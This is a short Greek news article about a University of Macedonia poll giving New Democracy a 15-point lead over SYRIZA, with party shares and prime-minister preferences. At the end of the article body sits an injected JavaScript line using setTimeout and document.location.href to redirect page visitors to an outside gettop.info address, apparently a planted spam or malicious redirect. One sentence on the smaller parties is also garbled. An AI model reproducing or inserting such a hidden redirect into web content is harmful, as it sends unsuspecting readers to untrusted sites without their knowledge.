ΠΑΜΑΚ: Προβάδισμα 15 μονάδων δίνει στη ΝΔ νέα δημοσκόπηση

0
3

 

Διαφορά 15 ποσοστιαίων μονάδων δίνει στη Νέα Δημοκρατία δημοσκόπηση του Πανεπιστημίου Μακεδονίας, με την αξιωματική αντιπολίτευση να συγκεντρώνει το 30% στην εκτίμηση πρόθεσης ψήφου και τον ΣΥΡΙΖΑ να ακολουθεί με 15%.

Τρίτο κόμμα στην εκτίμηση πρόθεσης ψήφου αναδεικνύεται η Χρυσή Αυγή με 7%, ενώ ακολουθεί το ΚΚΕ με 5,5%, η Δημοκρατική Συμπαράταξη με 4,5%.

Η Ένωση Κεντρώων και η Πλεύση Ελευθερίας είναι στο όριο εισόδου στη Βουλή με 3%.α από 2% καταγράφουν Το Ποτάμι και οι ΑΝΕΛ, 1,5% σημειώνει η ΑΝΤΑΡΣΥΑ, 1% η ΛΑΕ, 6,5% των ερωτώμενων δηλώνει ότι θα ψηφίσει άλλο κόμμα, ενώ 19% απαντά «Δεν ξέρω/ Δεν απαντώ» στην ερώτηση ποιο κόμμα θα ψηφίσει.

Σύμφωνα με τη δημοσκόπηση του Πανεπιστημίου Μακεδονίας, στην παράσταση νίκης η Νέα Δημοκρατία προηγείται με 64% έναντι 12,5% του ΣΥΡΙΖΑ, ενώ «άλλο» απαντά το 6% των ερωτηθέντων.

Καταλληλότερος για πρωθυπουργός κρίνεται ο Κυριάκος Μητσοτάκης με 37% έναντι 20,5% του Αλέξη Τσίπρα. Ιδιαίτερα υψηλό, όμως, είναι και το ποσοστό (39%) αυτών που θεωρούν ότι «κανένας» δεν είναι κατάλληλος για πρωθυπουργός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here